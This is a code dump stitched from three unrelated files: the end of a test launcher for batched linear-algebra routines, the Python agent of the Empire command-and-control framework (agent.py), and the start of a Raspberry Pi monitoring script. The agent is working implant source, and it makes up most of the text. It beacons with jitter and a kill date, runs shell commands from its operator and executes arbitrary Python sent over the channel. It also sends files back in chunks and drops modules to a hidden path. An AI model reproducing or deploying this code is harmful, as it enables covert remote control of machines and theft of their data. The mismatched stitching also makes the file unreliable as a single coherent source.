'test_dsyrk_batch',
'test_csyrk_batch',
'test_zsyrk_batch'
]
ranges = [
'--range 2:70+1',
'--range 32:256:32'
]
options = check
batchCount = defaultBatchCount;
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_POTRF
if (TEST_BATCH_POTRF == 1):
variants = ['-L',
# '-U',
]
programs = ['test_spotrf_batch',
'test_dpotrf_batch',
'test_cpotrf_batch',
'test_zpotrf_batch'
]
ranges = [
'--range 2:70+1',
'--range 32:256:32'
]
options = check
batchCount = defaultBatchCount;
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_LAUUM
if (TEST_BATCH_LAUUM == 1):
variants = ['-L',
# '-U',
]
programs = ['test_slauum_batch',
'test_dlauum_batch',
'test_clauum_batch',
'test_zlauum_batch'
]
ranges = [
'--range 2:70+1',
'--range 32:256:32'
]
options = check
batchCount = defaultBatchCount;
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_TRTRI
if (TEST_BATCH_TRTRI == 1):
variants = ['-L -DN',
# '-L -DU',
# '-U -DN',
# '-U -DU',
]
programs = ['test_strtri_batch',
'test_dtrtri_batch',
'test_ctrtri_batch',
'test_ztrtri_batch'
]
ranges = [
'--range 2:70+1',
'--range 32:256:32'
]
options = check
batchCount = defaultBatchCount;
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_POTRS
if (TEST_BATCH_POTRS == 1):
variants = ['-SR -L',
# '-SR -U',
# '-SL -L',
# '-SL -U',
]
programs = ['test_spotrs_batch',
'test_dpotrs_batch',
'test_cpotrs_batch',
'test_zpotrs_batch'
]
ranges = [
'--range 2:70+1',
'--range 32:256:32'
]
options = check
batchCount = defaultBatchCount;
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_POTRI
if (TEST_BATCH_POTRI == 1):
variants = ['-L',
# '-U',
]
programs = ['test_spotri_batch',
'test_dpotri_batch',
'test_cpotri_batch',
'test_zpotri_batch'
]
ranges = [
'--range 2:70+1',
'--range 32:256:32'
]
options = check
batchCount = defaultBatchCount;
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_POTI
if (TEST_BATCH_POTI == 1):
variants = ['-L',
# '-U',
]
programs = ['test_spoti_batch',
'test_dpoti_batch',
'test_cpoti_batch',
'test_zpoti_batch'
]
ranges = [
'--range 2:70+1',
'--range 32:256:32'
]
options = check
batchCount = defaultBatchCount;
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_POSV
if (TEST_BATCH_POSV == 1):
variants = ['-SR',
# '-SL',
]
programs = ['test_sposv_batch',
'test_dposv_batch',
'test_cposv_batch',
'test_zposv_batch'
]
ranges = [
'--range 2:70+1',
'--range 32:256:32'
]
options = check
batchCount = defaultBatchCount;
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
|
agent.py | from __future__ import division
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import range
from builtins import object
from past.utils import old_div
import __future__
import struct
import time
import base64
import subprocess
import random
import time
import datetime
import os
import sys
import trace
import shlex
import zlib
import threading
import http.server
import zipfile
import io
import imp
import marshal
import re
import shutil
import pwd
import socket
import math
import stat
import grp
from stat import S_ISREG, ST_CTIME, ST_MODE
from os.path import expanduser
from io import StringIO
from threading import Thread
################################################
#
# agent configuration information
#
################################################
# print "starting agent"
# profile format ->
# tasking uris | user agent | additional header 1 | additional header 2 | ...
profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
if server.endswith("/"): server = server[0:-1]
delay = 60
jitter = 0.0
lostLimit = 60
missedCheckins = 0
jobMessageBuffer = ''
currentListenerName = ""
sendMsgFuncCode = ""
# killDate form -> "MO/DAY/YEAR"
killDate = 'REPLACE_KILLDATE'
# workingHours form -> "9:00-17:00"
workingHours = 'REPLACE_WORKINGHOURS'
parts = profile.split('|')
taskURIs = parts[0].split(',')
userAgent = parts[1]
headersRaw = parts[2:]
defaultResponse = base64.b64decode("")
jobs = []
moduleRepo = {}
_meta_cache = {}
# global header dictionary
# sessionID is set by stager.py
# headers = {'User-Agent': userAgent, "Cookie": "SESSIONID=%s" %(sessionID)}
headers = {'User-Agent': userAgent}
# parse the headers into the global header dictionary
for headerRaw in headersRaw:
try:
headerKey = headerRaw.split(":")[0]
headerValue = headerRaw.split(":")[1]
if headerKey.lower() == "cookie":
headers['Cookie'] = "%s;%s" %(headers['Cookie'], headerValue)
else:
headers[headerKey] = headerValue
except:
pass
################################################
#
# communication methods
#
################################################
REPLACE_COMMS
################################################
#
# encryption methods
#
################################################
def decode_routing_packet(data):
"""
Parse ALL routing packets and only process the ones applicable
to this agent.
"""
# returns {sessionID : (language, meta, additional, [encData]), ...}
packets = parse_routing_packet(stagingKey, data)
for agentID, packet in packets.items():
if agentID == sessionID:
(language, meta, additional, encData) = packet
# if meta == 'SERVER_RESPONSE':
process_tasking(encData)
else:
# TODO: how to handle forwarding on other agent routing packets?
pass
def build_response_packet(taskingID, packetData, resultID=0):
"""
Build a task packet for an agent.
[2 bytes] - type
[2 bytes] - total # of packets
[2 bytes] - packet #
[2 bytes] - task/result ID
[4 bytes] - length
[X...] - result data
+------+--------------------+----------+---------+--------+-----------+
| Type | total # of packets | packet # | task ID | Length | task data |
+------+--------------------+----------+---------+--------+-----------+
| 2 | 2 | 2 | 2 | 4 | <Length> |
+------+--------------------+----------+---------+--------+-----------+
"""
packetType = struct.pack('=H', taskingID)
totalPacket = struct.pack('=H', 1)
packetNum = struct.pack('=H', 1)
resultID = struct.pack('=H', resultID)
if packetData:
if(isinstance(packetData, str)):
packetData = base64.b64encode(packetData.encode('utf-8', 'ignore'))
else:
packetData = base64.b64encode(packetData.decode('utf-8').encode('utf-8','ignore'))
if len(packetData) % 4:
packetData += '=' * (4 - len(packetData) % 4)
length = struct.pack('=L',len(packetData))
return packetType + totalPacket + packetNum + resultID + length + packetData
else:
length = struct.pack('=L', 0)
return packetType + totalPacket + packetNum + resultID + length
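# Worked example (illustrative): on a little-endian host, a type-40 packet
# carrying b"id" with resultID=7 base64-encodes the data to b"aWQ=" and packs
# the header as
#   \x28\x00 \x01\x00 \x01\x00 \x07\x00 \x04\x00\x00\x00
# (type, total packets, packet #, result ID, length) followed by b"aWQ=".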
def parse_task_packet(packet, offset=0):
"""
Parse a result packet-
[2 bytes] - type
[2 bytes] - total # of packets
[2 bytes] - packet #
[2 bytes] - task/result ID
[4 bytes] - length
[X...] - result data
+------+--------------------+----------+---------+--------+-----------+
| Type | total # of packets | packet # | task ID | Length | task data |
+------+--------------------+----------+---------+--------+-----------+
| 2 | 2 | 2 | 2 | 4 | <Length> |
+------+--------------------+----------+---------+--------+-----------+
Returns a tuple of (packetType, totalPacket, packetNum, resultID, length, data, remainingData)
"""
# print "parse_task_packet"
if(isinstance(packet, str)):
packet = packet.encode('UTF-8')
try:
packetType = struct.unpack('=H', packet[0+offset:2+offset])[0]
totalPacket = struct.unpack('=H', packet[2+offset:4+offset])[0]
packetNum = struct.unpack('=H', packet[4+offset:6+offset])[0]
resultID = struct.unpack('=H', packet[6+offset:8+offset])[0]
length = struct.unpack('=L', packet[8+offset:12+offset])[0]
packetData = packet[12+offset:12+offset+length]
remainingData = packet[12+offset+length:]
return (packetType, totalPacket, packetNum, resultID, length, packetData, remainingData)
except Exception as e:
print("parse_task_packet exception:",e)
return (None, None, None, None, None, None, None)
def process_tasking(data):
global missedCheckins
# processes an encrypted data packet
# -decrypts/verifies the response to get
# -extracts the packets and processes each
try:
# aes_decrypt_and_verify is in stager.py
tasking = aes_decrypt_and_verify(key, data)
(packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking)
# if we get to this point, we have a legit tasking so reset missedCheckins
missedCheckins = 0
# execute/process the packets and get any response
resultPackets = ""
result = process_packet(packetType, data, resultID)
if result:
resultPackets += result
packetOffset = 12 + length
while remainingData and remainingData != '':
(packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking, offset=packetOffset)
result = process_packet(packetType, data, resultID)
if result:
resultPackets += result
packetOffset += 12 + length
# send_message() is patched in from the listener module
send_message(resultPackets)
except Exception as e:
# print "processTasking exception:",e
pass
def process_job_tasking(result):
# process job data packets
# - returns to the C2
# execute/process the packets and get any response
try:
resultPackets = ""
if result:
resultPackets += result
# send packets
send_message(resultPackets)
except Exception as e:
print("processJobTasking exception:",e)
pass
def process_packet(packetType, data, resultID):
if(isinstance(data, bytes)):
data = data.decode('UTF-8')
try:
packetType = int(packetType)
except Exception as e:
return None
if packetType == 1:
# sysinfo request
# get_sysinfo should be exposed from stager.py
send_message(build_response_packet(1, get_sysinfo(), resultID))
elif packetType == 2:
# agent exit
send_message(build_response_packet(2, "", resultID))
agent_exit()
elif packetType == 40:
# run a command
parts = data.split(" ")
if len(parts) == 1:
data = parts[0]
resultData = str(run_command(data))
send_message(build_response_packet(40, resultData + "\r\n ..Command execution completed.", resultID))
else:
cmd = parts[0]
cmdargs = ' '.join(parts[1:len(parts)])
resultData = str(run_command(cmd, cmdargs=cmdargs))
send_message(build_response_packet(40, resultData + "\r\n ..Command execution completed.", resultID))
elif packetType == 41:
# file download
objPath = os.path.abspath(data)
fileList = []
if not os.path.exists(objPath):
send_message(build_response_packet(40, "file does not exist or cannot be accessed", resultID))
elif not os.path.isdir(objPath):
fileList.append(objPath)
else:
# recursive dir listing
for folder, subs, files in os.walk(objPath):
for filename in files:
#dont care about symlinks
if os.path.exists(objPath):
fileList.append(objPath + "/" + filename)
for filePath in fileList:
offset = 0
size = os.path.getsize(filePath)
partIndex = 0
while True:
# get 512kb of the given file starting at the specified offset
encodedPart = get_file_part(filePath, offset=offset, base64=False)
c = compress()
start_crc32 = c.crc32_data(encodedPart)
comp_data = c.comp_data(encodedPart)
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart)
partData = "%s|%s|%s" %(partIndex, filePath, encodedPart)
if not encodedPart or encodedPart == '' or len(encodedPart) == 16:
break
send_message(build_response_packet(41, partData, resultID))
global delay
global jitter
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = old_div(1,jitter)
minSleep = int((1.0-jitter)*delay)
maxSleep = int((1.0+jitter)*delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
partIndex += 1
offset += 512000
elif packetType == 42:
# file upload
try:
parts = data.split("|")
filePath = parts[0]
base64part = parts[1]
raw = base64.b64decode(base64part)
d = decompress()
dec_data = d.dec_data(raw, cheader=True)
if not dec_data['crc32_check']:
send_message(build_response_packet(0, "[!] WARNING: File upload failed crc32 check during decompressing!.", resultID))
send_message(build_response_packet(0, "[!] HEADER: Start crc32: %s -- Received crc32: %s -- Crc32 pass: %s!." %(dec_data['header_crc32'],dec_data['dec_crc32'],dec_data['crc32_check']), resultID))
f = open(filePath, 'ab')
f.write(dec_data['data'])
f.close()
send_message(build_response_packet(42, "[*] Upload of %s successful" %(filePath), resultID))
except Exception as e:
send_message(build_response_packet(0, "[!] Error in writing file %s during upload: %s" %(filePath, str(e)), resultID))
elif packetType == 50:
# return the currently running jobs
msg = ""
if len(jobs) == 0:
msg = "No active jobs"
else:
msg = "Active jobs:\n"
for x in range(len(jobs)):
msg += "\t%s" %(x)
send_message(build_response_packet(50, msg, resultID))
elif packetType == 51:
# stop and remove a specified job if it's running
try:
# Calling join first seems to hang
# result = jobs[int(data)].join()
send_message(build_response_packet(0, "[*] Attempting to stop job thread", resultID))
result = jobs[int(data)].kill()
send_message(build_response_packet(0, "[*] Job thread stoped!", resultID))
jobs[int(data)]._Thread__stop()
jobs.pop(int(data))
if result and result != "":
send_message(build_response_packet(51, result, resultID))
except:
return build_response_packet(0, "error stopping job: %s" %(data), resultID)
elif packetType == 100:
# dynamic code execution, wait for output, don't save output
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
results = buffer.getvalue()
send_message(build_response_packet(100, str(results), resultID))
except Exception as e:
errorData = str(buffer.getvalue())
return build_response_packet(0, "error executing specified Python data: %s \nBuffer data recovered:\n%s" %(e, errorData), resultID)
elif packetType == 101:
# dynamic code execution, wait for output, save output
prefix = data[0:15].strip()
extension = data[15:20].strip()
data = data[20:]
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
c = compress()
start_crc32 = c.crc32_data(buffer.getvalue())
comp_data = c.comp_data(buffer.getvalue())
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart)
send_message(build_response_packet(101, '{0: <15}'.format(prefix) + '{0: <5}'.format(extension) + encodedPart, resultID))
except Exception as e:
# Also return partial code that has been executed
errorData = str(buffer.getvalue())
send_message(build_response_packet(0, "error executing specified Python data %s \nBuffer data recovered:\n%s" %(e, errorData), resultID))
elif packetType == 102:
# on disk code execution for modules that require multiprocessing not supported by exec
try:
implantHome = expanduser("~") + '/.Trash/'
moduleName = ".mac-debug-data"
implantPath = implantHome + moduleName
result = "[*] Module disk path: %s \n" %(implantPath)
with open(implantPath, 'w') as f:
f.write(data)
result += "[*] Module properly dropped to disk \n"
pythonCommand = "python %s" %(implantPath)
process = subprocess.Popen(pythonCommand, stdout=subprocess.PIPE, shell=True)
data = process.communicate()
result += data[0].strip()
try:
os.remove(implantPath)
result += "\n[*] Module path was properly removed: %s" %(implantPath)
except Exception as e:
print("error removing module filed: %s" %(e))
fileCheck = os.path.isfile(implantPath)
if fileCheck:
result += "\n\nError removing module file, please verify path: " + str(implantPath)
send_message(build_response_packet(100, str(result), resultID))
except Exception as e:
fileCheck = os.path.isfile(implantPath)
if fileCheck:
send_message(build_response_packet(0, "error executing specified Python data: %s \nError removing module file, please verify path: %s" %(e, implantPath), resultID))
send_message(build_response_packet(0, "error executing specified Python data: %s" %(e), resultID))
elif packetType == 110:
start_job(data)
send_message(build_response_packet(110, "job %s started" %(len(jobs)-1), resultID))
elif packetType == 111:
# TASK_CMD_JOB_SAVE
# TODO: implement job structure
pass
elif packetType == 121:
#base64 decode the script and execute
script = base64.b64decode(data)
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(script, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
result = str(buffer.getvalue())
send_message(build_response_packet(121, result, resultID))
except Exception as e:
errorData = str(buffer.getvalue())
send_message(build_response_packet(0, "error executing specified Python data %s \nBuffer data recovered:\n%s" %(e, errorData), resultID))
elif packetType == 122:
#base64 decode and decompress the data
try:
parts = data.split('|')
base64part = parts[1]
fileName = parts[0]
raw = base64.b64decode(base64part)
d = decompress()
dec_data = d.dec_data(raw, cheader=True)
if not dec_data['crc32_check']:
send_message(build_response_packet(122, "Failed crc32_check during decompression", resultID))
except Exception as e:
send_message(build_response_packet(122, "Unable to decompress zip file: %s" % (e), resultID))
zdata = dec_data['data']
zf = zipfile.ZipFile(io.BytesIO(zdata), "r")
if fileName in list(moduleRepo.keys()):
send_message(build_response_packet(122, "%s module already exists" % (fileName), resultID))
else:
moduleRepo[fileName] = zf
install_hook(fileName)
send_message(build_response_packet(122, "Successfully imported %s" % (fileName), resultID))
elif packetType == 123:
#view loaded modules
repoName = data
if repoName == "":
loadedModules = "\nAll Repos\n"
for key, value in list(moduleRepo.items()):
loadedModules += "\n----"+key+"----\n"
loadedModules += '\n'.join(moduleRepo[key].namelist())
send_message(build_response_packet(123, loadedModules, resultID))
else:
try:
loadedModules = "\n----"+repoName+"----\n"
loadedModules += '\n'.join(moduleRepo[repoName].namelist())
send_message(build_response_packet(123, loadedModules, resultID))
except Exception as e:
msg = "Unable to retrieve repo contents: %s" % (str(e))
send_message(build_response_packet(123, msg, resultID))
elif packetType == 124:
#remove module
repoName = data
try:
remove_hook(repoName)
del moduleRepo[repoName]
send_message(build_response_packet(124, "Successfully remove repo: %s" % (repoName), resultID))
except Exception as e:
send_message(build_response_packet(124, "Unable to remove repo: %s, %s" % (repoName, str(e)), resultID))
else:
send_message(build_response_packet(0, "invalid tasking ID: %s" %(taskingID), resultID))
################################################
#
# Custom Import Hook
# #adapted from https://github.com/sulinx/remote_importer
#
################################################
# [0] = .py ext, is_package = False
# [1] = /__init__.py ext, is_package = True
_search_order = [('.py', False), ('/__init__.py', True)]
class ZipImportError(ImportError):
"""Exception raised by zipimporter objects."""
# _get_info() = takes the fullname, then subpackage name (if applicable),
# and searches for the respective module or package
class CFinder(object):
"""Import Hook for Empire"""
def __init__(self, repoName):
self.repoName = repoName
def _get_info(self, repoName, fullname):
"""Search for the respective package or module in the zipfile object"""
parts = fullname.split('.')
submodule = parts[-1]
modulepath = '/'.join(parts)
#check to see if that specific module exists
for suffix, is_package in _search_order:
relpath = modulepath + suffix
try:
moduleRepo[repoName].getinfo(relpath)
except KeyError:
pass
else:
return submodule, is_package, relpath
#Error out if we can't find the module/package
msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
raise ZipImportError(msg)
def _get_source(self, repoName, fullname):
"""Get the source code for the requested module"""
submodule, is_package, relpath = self._get_info(repoName, fullname)
fullpath = '%s/%s' % (repoName, relpath)
source = moduleRepo[repoName].read(relpath)
source = source.replace('\r\n', '\n')
source = source.replace('\r', '\n')
return submodule, is_package, fullpath, source
def find_module(self, fullname, path=None):
try:
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
except ImportError:
return None
else:
return self
def load_module(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
code = compile(source, fullpath, 'exec')
mod = sys.modules.setdefault(fullname, imp.new_module(fullname))
mod.__loader__ = self
mod.__file__ = fullpath
mod.__name__ = fullname
if is_package:
mod.__path__ = [os.path.dirname(mod.__file__)]
exec(code, mod.__dict__)
return mod
def get_data(self, fullpath):
prefix = os.path.join(self.repoName, '')
if not fullpath.startswith(prefix):
raise IOError('Path %r does not start with module name %r' % (fullpath, prefix))
relpath = fullpath[len(prefix):]
try:
return moduleRepo[self.repoName].read(relpath)
except KeyError:
raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))
def is_package(self, fullname):
"""Return if the module is a package"""
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
return is_package
def get_code(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
return compile(source, fullpath, 'exec')
def install_hook(repoName):
if repoName not in _meta_cache:
finder = CFinder(repoName)
_meta_cache[repoName] = finder
sys.meta_path.append(finder)
def remove_hook(repoName):
if repoName in _meta_cache:
finder = _meta_cache.pop(repoName)
sys.meta_path.remove(finder)
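# Usage sketch (illustrative): once a zip has been registered via packet
# type 122, e.g. moduleRepo['repo'] containing 'foo/__init__.py', calling
# install_hook('repo') makes `import foo` resolve through CFinder;
# remove_hook('repo') detaches the finder again.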
################################################
#
# misc methods
#
################################################
class compress(object):
'''
Base class for init of the package. This will handle
the initial object creation for conducting basic functions.
'''
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
"""
Populates init.
"""
pass
def comp_data(self, data, cvalue=COMP_RATIO):
'''
Takes in a string and computes
the comp obj.
data = string wanting compression
cvalue = 0-9 comp value (default 9)
'''
cdata = zlib.compress(data,cvalue)
return cdata
def crc32_data(self, data):
'''
Takes in a string and computes crc32 value.
data = string before compression
returns:
HEX bytes of data
'''
crc = zlib.crc32(data) & 0xFFFFFFFF
return crc
def build_header(self, data, crc):
'''
Takes comp data, org crc32 value,
and adds self header.
data = comp data
crc = crc32 value
'''
header = struct.pack("!I",crc)
built_data = header + data
return built_data
class decompress(object):
'''
Base class for init of the package. This will handle
the initial object creation for conducting basic functions.
'''
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
"""
Populates init.
"""
pass
def dec_data(self, data, cheader=True):
'''
Takes:
Custom / standard header data
data = comp data with zlib header
BOOL cheader = passing custom crc32 header
returns:
dict with crc32 check and dec data string
ex. {"header_crc32": ..., "dec_crc32": ..., "crc32_check": True, "data": "-SNIP-"}
'''
if cheader:
comp_crc32 = struct.unpack("!I", data[:self.CRC_HSIZE])[0]
dec_data = zlib.decompress(data[self.CRC_HSIZE:])
dec_crc32 = zlib.crc32(dec_data) & 0xFFFFFFFF
if comp_crc32 == dec_crc32:
crc32 = True
else:
crc32 = False
return { "header_crc32" : comp_crc32, "dec_crc32" : dec_crc32, "crc32_check" : crc32, "data" : dec_data }
else:
dec_data = zlib.decompress(data)
return dec_data
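# Round-trip sketch (illustrative only): build a crc32-framed blob with
# compress and verify it on the receiving side with decompress.
#   c = compress()
#   blob = c.build_header(c.comp_data(raw), c.crc32_data(raw))
#   out = decompress().dec_data(blob, cheader=True)
#   assert out['crc32_check'] and out['data'] == raw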
def agent_exit():
# exit for proper job / thread cleanup
print('exiting agent')
if len(jobs) > 0:
print('jobs still running')
try:
for job_thread in jobs:
job_thread.kill()
del jobs[:]
except:
# die hard if thread kill fails
pass
exit()
def indent(lines, amount=4, ch=' '):
padding = amount * ch
return padding + ('\n'+padding).join(lines.split('\n'))
# from http://stackoverflow.com/questions/6893968/how-to-get-the-return-value-from-a-thread-in-python
class ThreadWithReturnValue(Thread):
def __init__(self, group=None, target=None, name=None,
args=(), kwargs={}, Verbose=None):
Thread.__init__(self, group, target, name, args, kwargs, Verbose)
self._return = None
def run(self):
if self._Thread__target is not None:
self._return = self._Thread__target(*self._Thread__args,
**self._Thread__kwargs)
def join(self):
Thread.join(self)
return self._return
class KThread(threading.Thread):
"""A subclass of threading.Thread, with a kill()
method."""
def __init__(self, *args, **keywords):
threading.Thread.__init__(self, *args, **keywords)
self.killed = False
def start(self):
"""Start the thread."""
self.__run_backup = self.run
self.run = self.__run # Force the Thread to install our trace.
threading.Thread.start(self)
def __run(self):
"""Hacked run function, which installs the
trace."""
sys.settrace(self.globaltrace)
self.__run_backup()
self.run = self.__run_backup
def globaltrace(self, frame, why, arg):
if why == 'call':
return self.localtrace
else:
return None
def localtrace(self, frame, why, arg):
if self.killed:
if why == 'line':
raise SystemExit()
return self.localtrace
def kill(self):
self.killed = True
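# Note (illustrative): kill() only takes effect on the next traced 'line'
# event, so pure-Python loops stop promptly while a blocking C call such
# as time.sleep() runs to completion first. Typical use:
#   t = KThread(target=long_running_job)
#   t.start()
#   ...
#   t.kill(); t.join()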
def start_job(code):
global jobs
# create a new code block with a defined method name
codeBlock = "def method():\n" + indent(code)
# register the code block
code_obj = compile(codeBlock, '<string>', 'exec')
# code needs to be in the global listing
# not the locals() scope
exec(code_obj, globals())
# create/start/return the thread
# call job_func so sys output data can be captured
codeThread = KThread(target=job_func)
codeThread.start()
jobs.append(codeThread)
def job_func():
try:
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
# now call the function required
# and capture the output via sys
method()
sys.stdout = old_stdout
dataStats_2 = mystdout.getvalue()
result = build_response_packet(110, str(dataStats_2))
process_job_tasking(result)
except Exception as e:
p = "error executing specified Python job data: " + str(e)
result = build_response_packet(0, p)
process_job_tasking(result)
def job_message_buffer(message):
# Supports job messages for checkin
global jobMessageBuffer
try:
jobMessageBuffer += str(message)
except Exception as e:
print(e)
def get_job_message_buffer():
global jobMessageBuffer
try:
result = build_response_packet(110, str(jobMessageBuffer))
jobMessageBuffer = ""
return result
except Exception as e:
return build_response_packet(0, "[!] Error getting job output: %s" %(e))
def send_job_message_buffer():
if len(jobs) > 0:
result = get_job_message_buffer()
process_job_tasking(result)
else:
pass
def start_webserver(data, ip, port, serveCount):
# thread data_webserver for execution
t = threading.Thread(target=data_webserver, args=(data, ip, port, serveCount))
t.start()
return
def data_webserver(data, ip, port, serveCount):
# hosts a file on port and IP servers data string
hostName = str(ip)
portNumber = int(port)
data = str(data)
serveCount = int(serveCount)
count = 0
class serverHandler(http.server.BaseHTTPRequestHandler):
def do_GET(s):
"""Respond to a GET request."""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(data)
def log_message(s, format, *args):
return
server_class = http.server.HTTPServer
httpServer = server_class((hostName, portNumber), serverHandler)
try:
while (count < serveCount):
httpServer.handle_request()
count += 1
except:
pass
httpServer.server_close()
return
def permissions_to_unix_name(st_mode):
permstr = ''
usertypes = ['USR', 'GRP', 'OTH']
for usertype in usertypes:
perm_types = ['R', 'W', 'X']
for permtype in perm_types:
perm = getattr(stat, 'S_I%s%s' % (permtype, usertype))
if st_mode & perm:
permstr += permtype.lower()
else:
permstr += '-'
return permstr
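# Worked example (illustrative): st_mode 0o644 yields 'rw-r--r--',
# 0o755 yields 'rwxr-xr-x'.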
def directory_listing(path):
# directory listings in python
# https://www.opentechguides.com/how-to/article/python/78/directory-file-list.html
res = ""
for fn in os.listdir(path):
fstat = os.stat(os.path.join(path, fn))
permstr = permissions_to_unix_name(fstat[0])
if os.path.isdir(fn):
permstr = "d{}".format(permstr)
else:
permstr = "-{}".format(permstr)
user = pwd.getpwuid(fstat.st_uid)[0]
group = grp.getgrgid(fstat.st_gid)[0]
# Convert file size to MB, KB or Bytes
if (fstat.st_size > 1024 * 1024):
fsize = math.ceil(old_div(fstat.st_size, (1024 * 1024)))
unit = "MB"
elif (fstat.st_size > 1024):
fsize = math.ceil(old_div(fstat.st_size, 1024))
unit = "KB"
else:
fsize = fstat.st_size
unit = "B"
mtime = time.strftime("%X %x", time.gmtime(fstat.st_mtime))
res += '{} {} {} {:18s} {:f} {:2s} {:15.15s}\n'.format(permstr,user,group,mtime,fsize,unit,fn)
return res
# additional implementation methods
def run_command(command, cmdargs=None):
if re.compile("(ls|dir)").match(command):
if cmdargs == None or not os.path.exists(cmdargs):
cmdargs = '.'
return directory_listing(cmdargs)
if re.compile("cd").match(command):
os.chdir(cmdargs)
return str(os.getcwd())
elif re.compile("pwd").match(command):
return str(os.getcwd())
elif re.compile("rm").match(command):
if cmdargs == None:
return "please provide a file or directory"
if os.path.exists(cmdargs):
if os.path.isfile(cmdargs):
os.remove(cmdargs)
return "done."
elif os.path.isdir(cmdargs):
shutil.rmtree(cmdargs)
return "done."
else:
return "unsupported file type"
else:
return "specified file/directory does not exist"
elif re.compile("mkdir").match(command):
if cmdargs == None:
return "please provide a directory"
os.mkdir(cmdargs)
return "Created directory: {}".format(cmdargs)
elif re.compile("(whoami|getuid)").match(command):
return pwd.getpwuid(os.getuid())[0]
elif re.compile("hostname").match(command):
return str(socket.gethostname())
else:
if cmdargs != None:
command = "{} {}".format(command,cmdargs)
p = subprocess.Popen(command, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
return p.communicate()[0].strip()
def get_file_part(filePath, offset=0, chunkSize=512000, base64=True):
if not os.path.exists(filePath):
return ''
f = open(filePath, 'rb')
f.seek(offset, 0)
data = f.read(chunkSize)
f.close()
if base64:
return base64.b64encode(data)
else:
return data
################################################
#
# main agent functionality
#
################################################
while(True):
try:
if workingHours != '' and 'WORKINGHOURS' not in workingHours:
try:
start,end = workingHours.split('-')
now = datetime.datetime.now()
startTime = datetime.datetime.strptime(start, "%H:%M")
endTime = datetime.datetime.strptime(end, "%H:%M")
# anchor the parsed clock times to today so the window comparison works
startTime = now.replace(hour=startTime.hour, minute=startTime.minute, second=0, microsecond=0)
endTime = now.replace(hour=endTime.hour, minute=endTime.minute, second=0, microsecond=0)
if not (startTime <= now <= endTime):
sleepTime = startTime - now
if sleepTime.total_seconds() < 0:
# already past today's window; sleep until tomorrow's start
sleepTime += datetime.timedelta(days=1)
# sleep until the start of the next window
time.sleep(sleepTime.seconds)
except Exception as e:
pass
# check if we're past the killdate for this agent
# killDate form -> MO/DAY/YEAR
if killDate != "" and 'KILLDATE' not in killDate:
now = datetime.datetime.now().date()
try:
killDateTime = datetime.datetime.strptime(killDate, "%m/%d/%Y").date()
except:
killDateTime = None
if killDateTime is not None and now >= killDateTime:
msg = "[!] Agent %s exiting" %(sessionID)
send_message(build_response_packet(2, msg))
agent_exit()
# exit if we miss communicating with the server enough times
if missedCheckins >= lostLimit:
agent_exit()
# sleep for the randomized interval
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = old_div(1,jitter)
minSleep = int((1.0-jitter)*delay)
maxSleep = int((1.0+jitter)*delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
(code, data) = send_message()
if code == '200':
try:
send_job_message_buffer()
except Exception as e:
result = build_response_packet(0, str('[!] Failed to check job buffer!: ' + str(e)))
process_job_tasking(result)
if data == defaultResponse:
missedCheckins = 0
else:
decode_routing_packet(data)
else:
pass
# print "invalid code:",code
except Exception as e:
print("main() exception: %s" % (e))
|
wx_connection.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import urllib2
import websocket
import commands
import time
import os
import threading
import sys
#f = file('/dev/null', 'w')
#sys.stderr = f
commands.getoutput("echo 18 > /sys/class/gpio/export")
commands.getoutput("echo out > /sys/class/gpio/gpio18/direction")
global mark_num
#Return % of CPU used and temperature
def get_CPU_info():
cpulog_1 = commands.getoutput("cat /proc/stat | grep 'cpu ' | awk '{print $2+$3+$4+$5+$6+$7+$8\" \"$5}'")
cpulog_1 = cpulog_1.split()
time.sleep(1)
cpulog_2 = commands.getoutput("cat /proc/stat | grep 'cpu ' | awk '{print $2+$3+$4+$5+$6+$7+$8\" \"$5}'")
cpulog_2 = cpulog_2.split()
total = float(cpulog_2[0]) - float(cpulog_1[0])
idle = float(cpulog_2[1]) - float(cpulog_1[1])
CPU_use = "%.1f" % (100 - (idle*100/total))
res = commands.getoutput('cat /sys/class/hwmon/hwmon0/device/temp1_input')
# res = "33333"
CPU_temp = "%.1f" % (float(res)/1000)
CPUinfo = "CPU||%s||%s" % (CPU_temp,CPU_use)
return CPUinfo
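#Note (illustrative): usage is computed from two /proc/stat samples one
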